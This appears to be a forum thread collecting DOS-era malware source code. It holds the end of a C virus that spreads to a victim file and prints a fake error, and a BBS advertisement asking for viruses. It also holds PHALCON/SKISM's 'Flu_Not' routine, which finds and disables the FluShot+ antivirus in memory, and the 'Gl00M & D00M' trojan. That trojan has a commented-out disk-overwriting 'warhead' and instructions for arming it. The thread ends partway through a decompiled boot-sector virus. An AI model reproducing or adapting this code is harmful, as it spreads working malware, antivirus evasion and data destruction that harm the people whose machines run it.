    static char *err_msg[] = {"Out of memory", "Bad EXE format",
                  "Invalid DOS version", "Bad memory block",
                  "FCB creation error", "Sharing violation",
                  "Abnormal program termination",
                  "Divide error"
                 };
    register char *virus_name = *_argv;
 
    spread(virus_name, victim());
    puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]);
    return(1);
}
 
 
 
                  ɍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͻ
                  ?          The Hell Pit BBS              ?
                  ?              1200/2400                 ?
                  ? Sysops:    Operating At    Permanent   ?
                  ?  HADES       4,500,000? suntans    ?
                  ?  K?TO                      available   ?
                  ?       ?    (708)459-7267               ?
                  ?      ???                   ?          ??
                  ? ?   ?????      ?          ??         ???
                  ??   ???????      ?        ????       ????
                  ??? ?????????   ????     ???????     ?????
                  ?? ??????????? ???????   ????????   ??????
                  ??????????????????????? ?????????? ???????
                  ??????????????????????????????????????????
                  ȍ͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍͍ͼ
                            We want your viruses!
 
 
 
 
 
A 11C
DB "NMAN"
 
W
Q

C Code:

Select All | Show/Hide

// Flu_Not version 1.0
// 27 Nov 1991
// Dark Angel & Demogorgon of PHALCON/SKISM Co-op
//
// This is to be used in a program which bypasses FluShot.
// The method is completely generic and 99.99% infallible.
// To use it, #include the file and call checkflu(). This
// will set up all the necessary variables. flu_disable()
// and flu_enable() do what they imply.
//
// NOTE: checkflu() MUST be called before flu_disable and
// flu_enable.
//
// Oh yeah, it works under TC/BC
#ifndef __DOS_H__
#include <dos.h>
#endif
int flu_seg, flu_off = 0x1000;
int fluinstalled = 0;
int checkflu(void);
// flu_disable() is a macro to disable FluShot+ (Duh!)
#define flu_disable() if (fluinstalled) poke(flu_seg,flu_off,0xC3F8)
// Need I explain flu_enable()?
#define flu_enable() if (fluinstalled) poke(flu_seg,flu_off,0x5250)
// checkflu() returns a 0 if FluShot+ is not installed, 1 otherwise
int checkflu(void)
{
// Note that checkflu() doesn't use INT 21h/FF0Fh to determine if
// FluShot+ is resident. This was because I was lazy and didn't
// want to invoke TASM when compiling. It is easy enough to do.
// Find possible FluShot+ segment in interrupt table
flu_seg = peek(0x0000,0x004E);
// Search for 0x593C, the identifier for the FluShot+ "blue window"
// routine
while ((peek(flu_seg,++flu_off)) != 0x593C)
// If not found in the first 0x5000 bytes of code, then FluShot+
// isn't installed
if (flu_off > 0x5000) return (0);
while (peek(flu_seg,--flu_off) != 0x5250)
// Search for the beginning of the routine, which is marked by
// 0x5250. If not found by 0x1001, then FluShot+ is not installed
if (flu_off < 0x1001) return (0);
// Yay! We found it! flu_seg and flu_off are now properly loaded.
fluinstalled = 1;
return (1);
}

AlexF · 02-08-2008, 08:06 AM

C Code:

Select All | Show/Hide

/*
Gl00M & D00M trojan, 2-'93 ۛ۲?????ĄĄœandoZč
*safe for compiling until 'armed': check the code*
*/
#include <string.h>
#include <conio.h>
#include <dos.h>
void clearscreen(void);
union REGS regs;
int gloom_screen[] = {
0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB,
0x5DB, 0x5DB, 0x520, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2DB, 0x2DB,
0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB,
0x5DB, 0x5DB, 0x520, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2DB, 0x2DB,
0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0xDDB, 0xDDB,
0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB,
0xADB, 0xADB, 0xADB, 0xADB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0x5DB, 0xDDB, 0xDDB,
0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB, 0xDDB,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB, 0xADB,
0xADB, 0xADB, 0xADB, 0xADB, 0x2DB, 0x2DB, 0x2DB, 0x2DB,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xDDB, 0xDDB,
0xDDB, 0xDDB, 0xDDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0xEDB, 0xEDB, 0xEDB, 0xEDB,
0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xADB, 0xADB,
0xADB, 0xADB, 0xADB, 0xADB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xDDB, 0xDDB,
0xDDB, 0xDDB, 0xDDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0xEDB, 0xEDB, 0xEDB, 0xEDB,
0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xADB, 0xADB,
0xADB, 0xADB, 0xADB, 0xADB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
0xCDB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB,
0x4DB, 0x4DB, 0x4DB, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xBDB, 0xBDB,
0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
0xBDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0xCDB, 0xCDB, 0xCDB, 0xCDB, 0xCDB,
0xCDB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x4DB,
0x4DB, 0x4DB, 0x4DB, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0xBDB, 0xBDB,
0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
0xBDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0xEDB, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
0xBDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x4DB, 0x4DB, 0x4DB, 0x4DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0xBDB, 0xBDB, 0xBDB, 0xBDB,
0xBDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x1DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB,
0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB,
0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB,
0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x11DB, 0x1DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x820, 0x1DB, 0x1DB, 0x1F54, 0x1F68, 0x1F65, 0x1F20,
0x1F77, 0x1F6F, 0x1F72, 0x1F73, 0x1F74, 0x1F20, 0x1F74, 0x1F72,
0x1F6F, 0x1F6A, 0x1F61, 0x1F6E, 0x1F20, 0x1F6F, 0x1F66, 0x1F20,
0x1F61, 0x1F6C, 0x1F6C, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x820, 0x1DB, 0x1F69, 0x1F73, 0x1F20, 0x1F74, 0x1F68,
0x1F65, 0x1F20, 0x1F6F, 0x1F6E, 0x1F65, 0x1F20, 0x1F74, 0x1F68,
0x1F61, 0x1F74, 0x1F20, 0x1F68, 0x1F69, 0x1F74, 0x1F73, 0x1DB,
0x1F79, 0x1F6F, 0x1F75, 0x1F21, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x820, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x820, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB,
0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x1DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x820, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120,
0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120,
0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x120,
0x120, 0x120, 0x120, 0x120, 0x120, 0x120, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x8DB,
0x8DB, 0x8DB, 0x8DB, 0x8DB, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB, 0x8EDB,
0x8EDB, 0x8EDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8ADB, 0x8ADB, 0x8ADB,
0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x3FDA, 0x30C4, 0x30C4,
0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4, 0x30C4,
0x30C4, 0x30C4, 0x30C4, 0x30BF, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB,
0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x8ADB, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB,
0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x3FB3, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x30B3, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB,
0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB, 0x8BDB,
0x8BDB, 0x8BDB, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x89DB, 0x89DB, 0x89DB,
0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB,
0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x3FB3, 0x3DB, 0x3DB,
0x3DB, 0x3E20, 0x3E20, 0x3E20, 0x3E20, 0x3E20, 0x3E20, 0x3E44,
0x3E6F, 0x3E6F, 0x3E6D, 0x3E20, 0x3E26, 0x3E20, 0x3E47, 0x3E6C,
0x3E6F, 0x3E6F, 0x3E6D, 0x3E20, 0x3E74, 0x3E69, 0x3E6D, 0x3E65,
0x3E2E, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x30B3, 0x89DB, 0x89DB, 0x89DB, 0x89DB,
0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB,
0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x89DB, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB,
0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x3FB3, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB, 0x3DB,
0x3DB, 0x3DB, 0x3DB, 0x30B3, 0x81DB, 0x81DB, 0x81DB, 0x81DB,
0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB, 0x81DB,
0x81DB, 0x81DB, 0x81DB, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x8DDB, 0x8DDB, 0x8DDB,
0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x3FC0, 0x3FC4, 0x3FC4,
0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4, 0x3FC4,
0x3FC4, 0x3FC4, 0x3FC4, 0x30D9, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB,
0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x8DDB, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB, 0x85DB,
0x85DB, 0x85DB, 0x85DB, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20};
main()
{
int scnBuf;
regs.h.ah = 15;
int86(16,®s,®s); /* get the video mode... */
if(regs.h.al == 7)
scnBuf = 0xB000; /* if the jerk has mono, kill him too */
else
scnBuf = 0xB800; /* color */
clearscreen();
movedata(FP_SEG(gloom_screen),FP_OFF(gloom_screen),scnBuf,0,sizeof(gloom_screen));
getch();
clearscreen();
}
/* clears the screen */
void clearscreen(void)
{
regs.h.ah = 6;
regs.h.al = 0;
regs.h.bh = 7;
regs.h.ch = 0;
regs.h.cl = 0;
regs.h.dh = 25;
regs.h.dl = 80;
int86(16,®s,®s);
/* this is the WARHEAD; keep the comments till you need to arm it, of course. */
/* this really clears the screen and every other god damn thing*/
/* chunks of "virmin" code, ha ha! */
/* char *vir; */
/* int i; */
/* strcpy(vir,""); */
/* for (i=0; i<40; i++) */
/* strcat(vir,"MicroSoft 1993"); */
/* abswrite(2,50,0,vir); */
/* abswrite(3,50,0,vir); */
/* abswrite(4,50,0,vir); */
/* abswrite(5,50,0,vir); */
/* printf("MicroSoft Corp."); */
/*}; */
}

C Code:

Select All | Show/Hide

/*
***************************************************************************
* *
* This file was prepared by EXEC-2-C code restoration utility Ver 0.1 *
* Copywrite (c) The Austin Code Works & Polyglot International *
* Jerusalem, 1991 *
* *
***************************************************************************
*/
#include "EXEC-2-C.H"
Byte var1_136 [ 15 ] = {
80, 83, 81, 82, 30, 6, 86, 87, 14, 31,
14, 7, 190, 4
};
Byte var1_200 [ 60 ] = {
187, 0, 124, 139, 14, 8, 0, 131, 249, 7,
117, 7, 186, 128, 0, 205, 19, 235, 43, 139,
14, 8, 0, 186, 0, 1, 205, 19, 114, 32,
14, 7, 184, 1, 2, 187, 0, 2, 185, 1,
0, 186, 128, 0, 205, 19, 114, 14, 51, 246,
252, 173, 59, 7, 117, 79, 173, 59, 71, 2
};
char var1_23c [ 2 ] = "uI";
char var1_2be [ 40 ] = "\n"
"Replace and press any key when ready\r\n";
char var1_2e6 [ 15 ] = "IO SYSMSDO";
Word var1_3be [ 417 ];
/*======== Code section prepared by EXEC-2-C code restoration utility =======*/
/****************************************************************************/
near main()
/****************************************************************************/
{
goto label_6;
label_1:
do {
dx = 0;
Pushf();
ax = 0x201; /*PCH : RM_Table_init*/
bx = 0x200; /*PCH : RM_Table_init*/
cx = 1; /*PCH : RM_Table_init*/
(*(FAR_FNC)0xA)();
if(!CarryFlg)
goto label_2;
ax = 0;
Pushf();
(*(FAR_FNC)0xA)();
} while(--si);
goto label_5;
label_2:
si = 0;
DirFlg = DOWN;
ax = DirFlg ? *((int *)si++) : *((int *)si--);
if(ax == *( Word *)bx) {
ax = DirFlg ? *((int *)si++) : *((int *)si--);
